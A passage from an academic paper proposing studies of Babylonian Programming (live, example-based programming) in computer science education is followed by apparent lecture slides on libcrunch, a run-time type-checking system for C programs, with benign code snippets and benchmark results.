sometimes to a degree that requires pen and paper on the side. At the same time, abstractions they encounter or need to use to solve a task (e.g., standard library calls) might be opaque as long as the vocabulary is still unknown. Although concrete examples might be available (e.g., textbooks, documentation, or StackOverflow), learners must deliberately seek them out, recognize which are useful, and map them back into their current task context, which is a distinct skill on its own. **IDEs and examples.** Modern general-purpose programming environments introduce interactivity to support both mental simulation and understanding of abstractions to some degree. A read-eval-print loop (REPL) might invite experimentation, but learners must come up with suitable examples to try. Automated tests can contain relatively complete examples that run parts of the system, but they are often located away from the code and thus harder to discover. The PyRet language ¹, in contrast, motivates tests directly following the definition of a function via its *where*-syntax. Besides the challenge of generating or finding suitable examples, learners are also facing the challenge of learning about how the program operates on the example data. The print statement is a ubiquitous way to observe dynamic behavior, but the resulting log needs to be put back into context (which might require careful formatting to recognize which statement produced which output) and is typically limited to textual representations. Most debuggers allow stopping the program at any point and inspecting its state. 
This allows learners to access a rich representation of composite data at a particular point in time, unfortunately with little support to easily keep track over time or quickly return to certain point after changes have been made. **Example-centric programming.** These problems have subsequently been addressed by treating examples as first-class entities in the programming environment rather than an artifact that needs to be manually constructed from, e.g., tests and print statements. Example-centric programming [5] first attempted to provide programmers with a side-by-side view of how state evolves as code is being run, e.g., from a 1. [https://pyret.org/](https://pyret.org/) test case. In Newspeak, Exemplars [1] are annotations that provide examples to methods, so that code is always ready for evaluation. By restricting the domain to certain data structures, richer visual representations of state evolution can be used - an example is the Kanon [9] system that synchronizes data structure visualization with step-wise code execution, highlights changes, and maps them back to the code that caused them. By maintaining the impression that the observable behavior of the example immediately responds to changes to either the program or the example - which is called liveness [13] - a class of systems named Example-based Live Programming (ELP) encourages experimentation and exploration by avoiding re-compile and re-run cycles. Babylonian Programming. While side-by-side views of code and example can implement rich visualizations on the "example side", the program itself remains spatially separated from the concrete state and behavior. Babylonian Programming (BP) [10] is an ELP system that moves examples even closer to the code by displaying concrete data at expression level. The example is always executable and reacts to changes immediately, e.g., the displayed intermediate values are always reflecting the most up-to-date behavior. In summary, examples in programming environments form a spectrum with regard to how close they are to the source code, with external documentation being the least accessible and semantically the least related (see Figure 1). General-purpose IDEs technically support examples but not very well. Example-centric environments are designed to support examples - often in a side-by-side view, and Babylonian Programming further integrates first-class examples into the code itself. However, BP has not yet been studied in educational contexts, although it optimizes several dimensions that can appeal to learners: proximity of examples minimizes the split-attention effect and displaying dynamic information over time supports mental simulation. BP can serve a double role in education as it allows educators to annotate code as a form of live documentation and invites learners to experiment due to its liveness. 2 Babylonian Programming Babylonian Programming (BP) is inspired by the way ancient Babylonians expressed their algorithms - in terms of concrete examples right next to the instructions [10]. Fortunately, we are not restricted to clay tablets anymore. A BP-enabled IDE introduces several concepts: (1) the Example, (2) Probes as a way to observe concrete behavior, and (3) Replacements to override expressions with user-controlled values as illustrated in Figure 2. Example. In BP, an Example provides concrete values to be able to run a particular section of code and, optionally, ![Figure 2](image-url) Figure 2. 
Core elements of Babylonian Programming: The programmer-curated Example (1) provides an instance of the class and arguments for the method call to construct a full execution context. Probes (2) render dynamic data captured during execution of the method – here, the content of the canvas – and are always updated immediately after code or Example changes. Replacements (3) allow programmers to isolate the Example from irrelevant state by skipping the execution of an expression and proceeding as if it evaluated to certain value. display its final result. In object-oriented environments, this includes example instances of classes, so that a realistic value of self can be assumed, as well as example arguments needed by a method call. Examples can be created using specialized tools, e.g., by writing their set-up code manually or selecting and persisting concrete values observed during run-time. Probe. A Probe can be attached to any expression, showing its value under the currently active Example(s). Probes are updated immediately on each change, i.e., the affected code path is being re-executed in the background. They can use rich, domain-specific visualizations, e.g. displaying the content of a drawing buffer to help users trace its evolution. If they are affected by multiple times (e.g. in a loop), they can visualize their value’s evolution either textually or using domain-specific representations again, such as sparklines. Probes can be anywhere in the control flow of an example, allowing users to trace concrete behavior deep into method calls. Replacement. A Replacement can override an expression and provide a fixed value instead. This can make an Example more self-contained by avoiding unrelated computation, e.g., bypassing user input by just assuming they provided certain input. It also encourages experimenting with what-if scenarios, e.g., by allowing to see the behavior if certain call returned something else. 2.1 Implementations of Babylonian Programming Babylonian Programming was initially implemented in the web-based live programming environment Lively4 [6] for the JavaScript language as Babylonian/JS [10]. A subsequent extension of the Language Server Protocol (LSP) enabled a language-agnostic implementation in Visual Studio Code based on the GraalVM runtime [8]. The implementation with the most complete integration into existing tools, however, is an implementation in Squeak/Smalltalk called Babylonian/S [12]. It provides access to examples, probes, and replacements directly in the code editor, debugger, and inspection tools. Figure 3 shows a screenshot of Babylonian/S. Due to its seamless integration, we will use Babylonian/S for our studies. 2.2 The Case for Babylonian Programming in Education The design of BP targets programmers in general, but we argue that its core concepts lend itself to overcome learning obstacles rooted in the split-attention effect. Additionally, BP has the potential to support mental simulation by observing the effects of any statement or expression in terms of concrete values. Assisting sub-goal formation through live documentation. Examples can be used to equip existing functionality (e.g. from the standard library) with a live documentation that helps learners identify the building blocks needed to solve a programming task. 
By providing an example-based big picture of the environment and its concepts, we expect examples to provide cues that positively affect the formation of sub-goals [2] during programming tasks, e.g., seeing a concrete demonstration what certain functions do might be more approachable than traditional documentation and learners might be encouraged to try out functionality they might have missed or re-implemented otherwise. Hence, we will explicitly study situations in which learners need awareness of code available in their environment to solve a programming task. Assisting self-explanation through easier simulation. Effective learners often engage in self-explanation [4], a process that draws on existing background knowledge and newly generated hypotheses to make sense of a problem or a solution presented as worked example “in their own words”. This may even include visualizing processes using pen and paper. In the context of teaching programming, learners are frequently observed to give explanations in terms of the concrete dynamic behavior they observe - for example the results of print statements [14]. BP has the potential to assist self-explanation by making it easier to mentally trace what a program does, possibly eliminating the need to use print statements or minimize situations that demand pen-and-paper self-explanations. Learning non-localized concepts. Previous approaches to improve the learning experience and effectiveness focus on individual algorithms and smaller programs. This is needed for beginners and allows the use of rich specialized visualizations in live examples. BP has the potential to better support advanced learning goals because Examples can be traced through arbitrarily nested calls, allowing realistic examples to co-exist with small examples that illustrate basic principles. For example, collection functions might be documented using lists of integers as examples, while a part of a game is equipped with a realistic example simulating player behavior. If that part in turn uses collection functions, learners can explore realistic usage scenarios with live data as well. Teaching architectural concepts, e.g. design patterns, can benefit as well as BP easily scales to concepts spanning multiple components. Approaching other domains through programming. The learning objectives supported by BP are not constrained to programming concepts alone. Many programs eventually model real-world domains. Working on such programs can be an effective way to teach that domain (e.g. teaching basic laws of ecosystems using a cellular automaton). BP allows teachers to introduce executable domain-specific examples. From this perspective, the program is a notation to formalize the phenomena in the domain and Examples make this notation approachable. Future implementations of BP might even support domain-specific visualizations. 3 Studying Babylonian Programming Babylonian Programming is a novel concept not yet established in an industrial or educational context. Thus, we propose two studies: A study that aims to provide a broad understanding of how Babylonian Programming can be used and a second study that is specifically designed to test its use in an educational context. While there are specific use cases for Babylonian Programming and its tools, there is currently little knowledge on when and how it is used in general because of its novelty. 
In order to study the effect of examples and Babylonian Programming in education, we first need to enhance our understanding of it in general, such as which programming domains it is most suitable for, in which ways developers create and use examples, and so on. This study would also uncover possible limitations of Babylonian/S, our chosen Babylonian Programming environment, and of its tools that should be addressed before conducting a more specialized study.

3.1 Study 1: General Usage of Babylonian Programming

In this first study, we plan to observe how participants use Babylonian Programming. We aim both to see in which situations or domains Babylonian Programming is especially applicable for later studies and to deepen our understanding of how Babylonian concepts are used at all. This will also enable us to address certain limitations of the concept or the concrete tools before conducting further studies with and on Babylonian/S.

Figure 3. A screenshot of Babylonian/S. Examples are defined at the top of the method, probes are added for visualizations directly in the code itself.

Figure 4. Exploratory study design: Participants working on a self-chosen task can request assistance and experimenters can ask clarifying questions.

Study Structure. We plan to observe participants working in a Babylonian/S system provided by us. We might ask questions during the study to confirm why participants decided to perform a specific interaction with the system, or whether they feel blocked or unable to do something (see Figure 4). From this, we hope to gather insights on when and how participants use Babylonian Programming. Interesting topics include:

- In which program domains is it used? Is Babylonian Programming suitable for the task the participant is working on?
- In which programming situations is it used? Do participants use it to explore the system? Is it used for debugging?
- How do participants get examples? Do they, e.g., write scripts or use live objects from the system? Do they have trouble with creating examples?
- Which Babylonian/S tools and features are used?
- What do participants want to do but cannot?

Participants. We plan to recruit participants with varying knowledge levels from our faculty. As later studies, such as the second study detailed in subsection 3.2, are aimed at undergraduate students, people from that group will also be recruited for this study. All participants will receive a short training on Babylonian/S and the general live programming features of Squeak/Smalltalk, so that no pre-existing familiarity with the system is required.

Task Design. As we want to observe how participants use Babylonian Programming with as much freedom as possible, we will try to observe them exploring the system or working on a self-chosen project. However, should we not find enough participants with projects suitable to our study, or should all projects fall into only one or two domains, we will intervene by preparing tasks that cover a large variety of domains.

3.2 Study 2: Babylonian Programming in an Educational Context

In this second study, we want to test Babylonian Programming in an educational context. We plan to focus on two aspects: 1. We would like to see whether Babylonian Programming improves how long it takes students to finish a given task. 2. We would like to see how it impacts the students' programming experience.

We plan to focus on the following questions for evaluation:

- Does Babylonian/S improve the correctness of results that students create?
- Does Babylonian/S improve how engaging students perceive tasks to be?
- Does Babylonian/S decrease frustration with the task in students?
- Does Babylonian/S improve the confidence of the students in their solution?
- Does Babylonian/S influence how long it takes students to finish a given task?

**Participants.** Our target demographic for this study is undergraduate students in their fourth, or a later, semester of study from our faculty. Because the participants are undergraduate students, we expect them to be relative novices in programming who are still learning about some of its core concepts. Because we are familiar with the teaching program of our faculty, we can anticipate which base concepts the students have already encountered in previous courses and prepare tasks accordingly. In particular, we can plan on all students having at least worked a little with a Squeak/Smalltalk environment in a mandatory lecture in their third semester.

**Operationalization.** In this study, we will equate “learning effectiveness” with whether students are able to correctly solve the given task. We want to enable students to correctly understand and answer the given tasks without, if possible, slowing down the task-solving process so considerably that it becomes unviable in actual courses. To measure the impact on learning effectiveness, we plan to record the time students needed to create their solution as well as whether their solution provides the behavior or functionality required by the task. But since education is not exclusively focused on the results but also on how students achieve these results and how sustainable their learning experience is, we also plan to study their "programming experience" with post-task questionnaires. We aim to provide questions that gauge how frustrating completing the task was, how “fun” or engaging it was, and how high their confidence in their result and understanding of the system is.

To understand some underlying aspects of our environment, we also plan to record how often participants switch context (in this case, methods or tool windows) and how often, as well as why, they use Babylonian features. Context switches usually negatively impact performance, as developers need to make a mental switch; if Babylonian Programming reduces the need for such switches, that might also influence participant performance. The measures on our Babylonian/S tools will provide us with some background information on how they influenced the participants; for instance, if a participant decides not to use Babylonian tools even if provided, a performance boost in that task would not be the result of our system.

Lastly, while we will be able to predict some characteristics and pre-experience of the expected participants, their exact knowledge may vary. Participants may, for instance, have additional experience from hobby projects or jobs outside of the university syllabus. Also, other factors such as exactly how many semesters the students have been studying, which courses they successfully passed, and their own confidence in their skills may vary as well. Because of these possible variations, we will include a questionnaire for the participants that, besides demographic data, will collect data on their experience and prior knowledge.

**Task Design.** This study will include multiple educational tasks suitable for our target demographic, e.g., feature creation tasks for a small game, a domain students would be familiar with from previous courses. The exact tasks and domain depend on the insights from our first study and previously outlined criteria [11] to ensure adequate complexity and answer times.
To get insights on each educational task under both of our experiment conditions, we plan to conduct this study as a factorial experiment and as a within-subject study. Ideal would be tasks that are simple enough for the participants to grasp within a session, while being complex enough to include, e.g., dynamic behavior or state. Enabling an understanding of the dynamic behavior of a system is both a core potential of Babylonian Programming and integral to our targeted participants: computer science students who have just finished their introductory programming courses.

4 Outlook

**Study implementation.** First, we will design a concrete plan for our first study. We will then recruit fitting participants and run the study. As this is an exploratory study, we might change the study set-up between study runs based on new insights. The study results will then be used both to alter and improve Babylonian/S and to gather knowledge about the applicability and usefulness of Babylonian Programming. The environment used for the study will be equipped with fine-grained monitoring facilities that allow us to learn whether, when, and how often participants interacted with certain features of the base system and the elements introduced by BP.

Using the insights gained from our first study, we will then design tasks for, and create a concrete plan for, the second study. This set-up will be tested with a few students in a pilot study to find and fix flaws or problems that might occur. The finalized plan will then be used to run the study with recruited undergraduate students. Based on the results, further studies could potentially be designed, for example an entire seminar or lecture using a BP-enabled programming environment in a longitudinal study.

**Expected improvements.** We expect that such a study will help us improve several aspects of BP itself, our Babylonian/S implementation, and the opportunities students have to learn a novel programming system like Smalltalk. A common issue with tools that deviate from the standard tool set is that they are unexpected and need to be designed with affordance in mind. When viewed under the educational lens, we expect to be able to tell helpful from less helpful features, learn how to make Examples and the tools for working with them more discoverable, identify which obstacles might prevent learners from creating their own Examples, and eventually arrive at an environment where Examples do not feel like a separate tool. While the quality of the BP environment and the examples provided by teachers can confound learning effects, our double study is designed to mitigate this effect: the first study allows us to run the second study with a BP-enabled environment devoid of serious flaws detected earlier.

Conclusion

The evolving integration of examples into programming environments increasingly affords teachers and learners opportunities to illustrate abstract programs with concrete examples. Babylonian Programming is a newer technique that promises to empower teachers and learners due to the proximity of examples to code, liveness, and applicability to larger programs. In this paper, we outlined the opportunities that come with Babylonian Programming to support mental simulation, sub-goal formation, and self-explanation in the context of educational material and exercises. We subsequently proposed an early design for two studies aimed at exploring this promise and elaborated on the necessary preparations, potential outcomes, and consequences for both teaching and programming environments.
Acknowledgments

This work is supported by the HPI-MIT "Designing for Sustainability" research program.³

References

---
³ https://hpi.de/en/research/cooperations-partners/research-program-designing-for-sustainability.html

Received 2023-07-17; accepted 2023-08-07
{"Source-Url": "https://www.hpi.uni-potsdam.de/hirschfeld/publications/media/KrebsMattisReinHirschfeld_2023_TowardStudyingExampleBasedLiveProgrammingInCsSeEducation_AcmDL.pdf", "len_cl100k_base": 5255, "olmocr-version": "0.1.53", "pdf-total-pages": 8, "total-fallback-pages": 0, "total-input-tokens": 24599, "total-output-tokens": 7226, "length": "2e12", "weborganizer": {"__label__adult": 0.0008535385131835938, "__label__art_design": 0.0010709762573242188, "__label__crime_law": 0.0008087158203125, "__label__education_jobs": 0.08892822265625, "__label__entertainment": 0.0001615285873413086, "__label__fashion_beauty": 0.0004243850708007813, "__label__finance_business": 0.00054931640625, "__label__food_dining": 0.0010175704956054688, "__label__games": 0.0012359619140625, "__label__hardware": 0.0012807846069335938, "__label__health": 0.0010137557983398438, "__label__history": 0.0006241798400878906, "__label__home_hobbies": 0.0003178119659423828, "__label__industrial": 0.0008845329284667969, "__label__literature": 0.000934123992919922, "__label__politics": 0.0007624626159667969, "__label__religion": 0.0011730194091796875, "__label__science_tech": 0.0145721435546875, "__label__social_life": 0.0004374980926513672, "__label__software": 0.006633758544921875, "__label__software_dev": 0.87353515625, "__label__sports_fitness": 0.0007710456848144531, "__label__transportation": 0.0013742446899414062, "__label__travel": 0.00048279762268066406}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 32485, 0.02328]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 32485, 0.92178]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 32485, 0.9213]], "google_gemma-3-12b-it_contains_pii": [[0, 4083, false], [4083, 7878, null], [7878, 12846, null], [12846, 18298, null], [18298, 20438, null], [20438, 24111, null], [24111, 29663, null], [29663, 32485, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4083, true], [4083, 7878, null], [7878, 12846, null], [12846, 18298, null], [18298, 20438, null], [20438, 24111, null], [24111, 29663, null], [29663, 32485, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 32485, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 32485, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 32485, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 32485, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 32485, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 32485, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 32485, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 32485, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 32485, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 32485, null]], "pdf_page_numbers": [[0, 4083, 1], [4083, 7878, 2], [7878, 12846, 3], [12846, 18298, 4], [18298, 20438, 5], [20438, 24111, 6], [24111, 29663, 7], [29663, 32485, 8]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 32485, 0.0]]}
olmocr_science_pdfs
2024-12-07
2024-12-07
1762a763ff58980f1896305ba8700d1d724519df
Run-time type checking of whole programs and other stories.
Stephen Kell
stephen.kell@cl.cam.ac.uk
Computer Laboratory, University of Cambridge

Wanted (naive version): check this!

```c
if (obj->type == OBJ_COMMIT) {
    if (process_commit(walker, (struct commit *)obj))  /* CHECK this (at run time) */
        return -1;
    return 0;
}
```

But also wanted:
- binary-compatible
- source-compatible
- reasonable performance
- avoid being C-specific!*

\* mostly... in fact, a general-purpose "dynamic" run-time (ask me)

I describe libcrunch, which is
- an infrastructure for run-time type checking
- encodes type checks as assertions over reified data types
- per-language front-ends (C; C++, Fortran, ...)
- supports idiomatic unsafe code, unmodified*
- target: safe assuming memory safety
- no binary interface changes
(* but sometimes out-of-band guidance helps)

Why care about unsafe languages?
- fine control of resource utilisation
- talk directly to operating system
- talk directly to hardware
- freedom to {simulate, violate} abstractions
- re-use existing code (a *huge* investment)
- unsafe is the "hard / general" case

What is "type-correctness"? "Type" means "data type"
- instantiate = allocate
- concerns storage
- "correct": reads and writes respect allocated data type
- cf. memory-correct (spatial, temporal)
Languages can be "safe"; programs can be "correct"

The user's eye view
- $ crunchcc -o myprog ...              # + other front-ends
- $ ./myprog                            # runs normally
- $ LD_PRELOAD=libcrunch.so ./myprog    # does checks
- myprog: Failed __is_a_internal(0x5a1220, 0x413560 a.k.a. "uint$32") at 0x40dade, allocation was a heap block of int$32 originating at 0x40daa1

How it works for C code, in a nutshell: the cast is guarded by an inserted assertion.

```c
if (obj->type == OBJ_COMMIT) {
    if (process_commit(walker,
            (assert(__is_a(obj, "struct_commit")), (struct commit *)obj)))
        return -1;
    return 0;
}
```

Want a runtime with magical powers
- tracking allocations
- with type info
- efficiently
- → fast __is_a() function

What does a C compiler not check?

```c
int a = 1;
char *b = ...;
void f(double);

f(a);             // okay: compiler adds conversion
b = a;            // not okay: compiler tells us
f(b);             // not okay: compiler tells us
f(*(double*)b);   // depends...
```

Want to check what the compiler punts on
- use of pointers ("distant" accesses)
- also (rarer): unions, varargs functions

Memory-correctness vs type-correctness (1)
Pointer-y things checked by existing tools
- spatial m-c – bounds (SoftBound, Asan)
- temporal₁ m-c – use-after-free (CETS, Asan)
- temporal₂ m-c – initializedness (Memcheck, Msan)
- nothing to do with types!
Slow: metadata per {value, pointer}, check on use.
Faster: metadata per allocation, check on create.

// a check over object metadata... guards creation of the pointer
(assert(__is_a(obj, "struct_commit")), (struct commit *)obj)

For now, assume memory-correct execution
- "also use one of those other tools"
Then do only the additional checks s.t.
- all memory accesses respect memory's *allocated type*
... which, for C, can be done by maintaining an invariant:
- every live pointer respects its *contract* (pointee type)
- must also check unsafe loads/stores *not* via pointers
- unions, varargs

What data type is being `malloc()`'d?
- ... guess from use of `sizeof`
- dump *typed allocation sites* from compiler
- guessing is moderately clever
- e.g. `malloc(sizeof (Blah) + n * sizeof (Foo))`

[Toolchain figure: the source tree (main.c, widget.c, util.c, ...) goes through a CIL-based compiler front-end, which dumps allocation sites (dumpallocs) and instruments pointer casts, producing main.i + .allocs, widget.i + .allocs, util.i + .allocs, ...]

- structure "subtyping" via containment
- function pointers (most of the time)
- void pointers
- char pointers
- integer ↔ pointer casts
- type-differing aliases
- custom allocators, memory pools etc.

[Figure: hierarchical model of allocations: mmap()/sbrk() at the bottom; libc malloc(), custom malloc() and custom heaps (e.g. Hotspot GC) above it; obstack (+ malloc), gslice and client code at the top.]

Somewhat difficult cases
Solved:
- opaque types
- complex use of sizeof
- structure "subtyping" via prefixing
Give up:
- avoidance of sizeof
- address-taken union members
- non-procedurally abstracted object allocation/re-use

The remaining awkwards
- `alloca`
- unions
- varargs
- generic use of non-generic pointers (`void**`, ...)
- casts of function pointers to non-supertypes
All solved/solvable with some extra instrumentation
- supply our own `alloca`
- instrument writes to unions
- instrument calls via varargs lvalues; use own `va_arg`
- instrument writes through `void**` (check invariant!)
- optionally instrument all indirect calls
[Figure: idealised view of the libcrunch toolchain. Deployed binaries with data-type assertions (/bin/foo, /lib/libxyz.so), debugging information with allocation-site information (/bin/.debug/foo, /lib/.debug/libxyz.so), and precomputed unique data types (libcrunch.so, /bin/.uniqtyp/foo.so) are loaded, linked and run by ld.so into a program image; __is_a queries (e.g. 0xdeadbeef, "Widget"?) consult the heap_index and uniqtypes and answer true or false.]

A model of data types: DWARF debugging info

```bash
$ cc -g -o hello hello.c && readelf -wi hello | column
```

Typical entries (cleaned up from the slide): a TAG_compile_unit with AT_language 1 (ANSI C), AT_name hello.c, AT_low_pc 0x4004f4 and AT_high_pc 0x400514; a TAG_base_type int (byte size 4, encoding 5, signed); a TAG_pointer_type (byte size 8); a TAG_base_type char (byte size 1, encoding 6); and TAG_formal_parameter entries such as argc (location fbreg - 20) and others at fbreg - 32.

Type info for each allocation. What is an allocation?
- static memory: `mmap`'d program binaries
- heap memory: "anonymous" `mmap`pings
  - returned by `malloc()` – "level 1" allocation
  - returned by `mmap()` – "level 0" allocation
  - (maybe) memory issued by user allocators...
- stack memory
We keep specialised *indexes* for each kind of memory...

**Representation of data types**

```c
struct ellipse {
    double maj, min;
    struct { double x, y; } ctr;
};
```

- use the linker to keep them unique
- uniqueness → "exact type" test is a pointer comparison
- `__is_a()` is a short search

What happens at run time?
[Figure: __is_a(0xdeadbee8, __uniqtype_double) looks up 0xdeadbee8 in the heap_index, yielding allocation site 0x8901234 and offset 0x8; the allocsites table maps the site to &__uniqtype_ellipse; find(&__uniqtype_double, &__uniqtype_ellipse, 0x8) succeeds, so the check returns true.]

Getting from objects to their metadata
Recall: binary & source compatibility requirements
- can't embed metadata into objects
- can't change object layouts at all!
- → need out-of-band ("disjoint") metadata
Pointers can point anywhere inside an object
- which may be stack-, static- or heap-allocated

Why the heap case is difficult, cf. virtual machine heaps
- Native objects are trees; no descriptive headers!
- VM-style objects: "no interior pointers"

To solve the heap case...
- we'll need some `malloc()` hooks...
- which keep an index of the heap
- in a `memtable`: an efficient address-keyed associative map
- must support (some) range queries
- storing the object's metadata
Memtables make aggressive use of virtual memory

Indexing heap chunks
Inspired by free chunk binning in Doug Lea's *malloc*... but index *allocated* chunks, binned by *address*

How many bins? Each bin is a linked list of heap chunks
- thread next/prev pointers through allocated chunks...
- also store metadata (allocation site address)
- overhead per chunk: one word + two bytes
Finding a chunk is $O(n)$ given a bin of size $n$
- → want bins to be as small as possible
- Q: how many bins can we have?
- A: lots... really, *lots*!

Really, how big? Bin index resembles a linear page table. Exploit
- sparseness of address space usage
- lazy memory commit on "modern OSes" (Linux)
Reasonable tuning for malloc heaps on Intel architectures:
- one bin covers 512 bytes of VAS
- each bin's head pointer takes one byte in the index
- covering an $n$-bit AS requires a $2^{n-9}$-byte bin index
(a small sketch of this arithmetic appears after the recap below)

Big picture of our heap memtable
- index by high-order bits of virtual address
- entries are one byte, each covering 512B of heap
- interior pointer lookups may require backward search
- pointers encoded compactly as local offsets (6 bits)
- instrumentation adds a trailer to each heap chunk

Indexing the heap with a memtable is...
- more VAS-efficient than shadow space (SoftBound)
- supports > 1 index, unlike placement-based approaches
Memtables are versatile
- buckets don't have to be linked lists
- can tune size / coverage...
We also use memtables to
- index every mapped page in the process ("level 0")
- index "deep" (level 2+) allocations
- index static allocations
- index the stack (map PC to frame uniqtype)

Remind me: what happens at run time?
[Figure: the same lookup as before: __is_a(0xdeadbee8, __uniqtype_double) consults heap_index, allocsites and uniqtypes, returning true.]

__is_a, containment...
Pointer $p$ might satisfy __is_a($p$, $T$) for $T_0$, $T_1$, ...
Consider "what is"
- &my_ellipse
- &my_ellipse.ctr
- ...
(Subclassing is usually implemented this way.)
__is_a is a nominal check, but we can also write
- __like_a – "structural" (unwrap one level)
- __refines – padded open unions (à la sockaddr)
- __named_a – opaque workaround
... or invent your own!

Recap
What we've just seen is
- a runtime system for evaluating type checks
- fast
- flexible
- a "whole program" design
- language-neutral
- binary compatible
What about *source* compatibility?
We also interfere with linking:
- link in uniqtypes referred to by each .o's checks
- hook allocation functions
- ... distinguishing wrappers from "deep" allocators
Currently provide options in environment variables...

```
LIBCRUNCH_ALLOC_FNS="xcalloc(zZ) xmalloc(Z) xrealloc(pZ) xmallocz(Z)"
LIBCRUNCH_LAZY_HEAP_TYPES="__PTR_void"
```
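To make the bin-index arithmetic from the memtable slides concrete, here is a minimal C sketch. It is illustrative only, not the libcrunch implementation: the real index threads per-bin linked lists through per-chunk trailers and encodes entries as 6-bit local offsets, whereas this sketch stores just one chunk start per 512-byte region.

```c
#include <stdint.h>
#include <stddef.h>

/* One byte of index per 512-byte region of heap address space.
 * Entry 0 means "no chunk starts in this region"; otherwise it is
 * 1 + the 8-byte-word offset of a chunk start within the region.
 * Per-chunk trailers (linking several chunks per bin and holding
 * allocation-site metadata) are omitted here. */
enum { LOG_REGION = 9, REGION = 1u << LOG_REGION, WORD = 8 };

static unsigned char *memtable;   /* lazily committed: one byte per region */
static uintptr_t      heap_base;  /* lowest heap address covered           */

static size_t region_of(const void *p)
{
    /* covering an n-bit address space needs 2^(n-9) of these entries */
    return ((uintptr_t)p - heap_base) >> LOG_REGION;
}

/* Called from a malloc() hook: remember where a chunk starts. */
static void memtable_insert(const void *chunk_start)
{
    uintptr_t in_region = ((uintptr_t)chunk_start - heap_base) & (REGION - 1);
    memtable[region_of(chunk_start)] = (unsigned char)(1 + in_region / WORD);
}

/* Query side: find the start of the chunk containing p, walking
 * backwards through earlier regions for interior pointers. */
static const void *memtable_lookup(const void *p)
{
    for (size_t r = region_of(p); ; --r) {
        unsigned char e = memtable[r];
        if (e) {
            uintptr_t start = heap_base + ((uintptr_t)r << LOG_REGION)
                              + (uintptr_t)(e - 1) * WORD;
            if (start <= (uintptr_t)p)
                return (const void *)start;
        }
        if (r == 0)
            return NULL;   /* no chunk found at or below p */
    }
}
```

An __is_a check would then map the returned chunk start to its recorded allocation site and, from there, to a uniqtype.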
## How fast is it?

SPEC CPU2006 results

<table>
<thead>
<tr> <th>benchmark</th> <th>normal/s</th> <th>crunch</th> <th>nopreload</th> <th>just allocs</th> </tr>
</thead>
<tbody>
<tr> <td>perlbench</td> <td>1.48</td> <td>+31 %</td> <td>–</td> <td>+3%</td> </tr>
<tr> <td>bzip2</td> <td>5.05</td> <td>+0 %</td> <td>+0%</td> <td>+0%</td> </tr>
<tr> <td>mcf</td> <td>2.49</td> <td>+6.8%</td> <td>–1%</td> <td>+0%</td> </tr>
<tr> <td>milc</td> <td>8.75</td> <td>+38 %</td> <td>+2%</td> <td>–1%</td> </tr>
<tr> <td>gobmk</td> <td>14.5</td> <td>+13 %</td> <td>+1%</td> <td>+1%</td> </tr>
<tr> <td>hmmer</td> <td>2.13</td> <td>+8.5%</td> <td>+8%</td> <td>+0%</td> </tr>
<tr> <td>sjeng</td> <td>3.25</td> <td>–2.2%</td> <td>–2%</td> <td>+0%</td> </tr>
<tr> <td>h264ref</td> <td>10.0</td> <td>+5 %</td> <td>+5%</td> <td>+1%</td> </tr>
<tr> <td>lbm</td> <td>3.43</td> <td>+24 %</td> <td>+0%</td> <td>+0%</td> </tr>
<tr> <td>sphinx3</td> <td>1.58</td> <td>+15 %</td> <td>+2%</td> <td>+4%</td> </tr>
<tr> <td>gcc</td> <td>0.989</td> <td>+289 %</td> <td>–</td> <td>+4%</td> </tr>
</tbody>
</table>

Popular errors
- sloppiness about signed vs unsigned
- some user-level allocation behaviour
- some cases of multiple indirection of `void`

```c
void get_obj(struct Foo **out);
void *opaque_obj;
get_obj(&opaque_obj);
```

False negatives:
- memory-incorrect programs
- unions
- over-coarse sloppification (e.g. `__like_a`)

More case studies needed...

```c
neighbor = (int **) calloc (NDIRS, sizeof(int *));
// ...
sort_eight_special ((void **) neighbor);
// where
void sort_eight_special (void **pt)
{
    void *tt [8];
    register int i;
    for (i=0;i<8;i++) tt[i]=pt[i];
    for (i=XUP;i<=TUP;i++) {pt[i]=tt[2*i]; pt[OPP_DIR(i)]=tt[2*i+1];}
}
```

Generic pointers to pointers to non-generic pointers

```c
PUBFUNC void dynarray_add(void ***ptab, int *nb_ptr, void *data)
{
    /* ... */
    /* every power of two we double array size */
    if ( ((nb & (nb - 1)) == 0) ) {
        if (!nb) nb_alloc = 1;
        else nb_alloc = nb * 2;
        pp = tcc_realloc (pp, nb_alloc * sizeof(void *));
        *ptab = pp;
    }
    /* ... */
}

char **libs = NULL;
/* ... */
dynarray_add((void ***)&libs, &nblibs, tcc_strdup(filename));
```

```c
typedef double LBM_Grid[SIZE_Z*SIZE_Y*SIZE_X*N_CELL_ENTRIES];
typedef LBM_Grid* LBM_GridPtr;

#define MAGIC_CAST(v) ((unsigned int*) ((void*) (&(v))))
#define FLAG_VAR(v) unsigned int* const _aux_ = MAGIC_CAST(v)
// ...
#define TEST_FLAG(g,x,y,z,f) \
    ((*MAGIC_CAST(GRID_ENTRY(g, x, y, z, FLAGS))) & (f))
#define SET_FLAG(g,x,y,z,f) \
    {FLAG_VAR(GRID_ENTRY(g, x, y, z, FLAGS)); (*_aux_) |= (f);}
```

```c
#define FUNC_CALL(r) (((AttributeDef*)&(r))->func_call)

typedef struct Sym {
    int v;                 /* symbol token */
    long r;                /* associated register */
    long c;                /* associated number */
    CType type;            /* associated type */
    struct Sym *next;      /* next related symbol */
    struct Sym *prev;      /* prev symbol in stack */
    struct Sym *prev_tok;  /* previous symbol for this token */
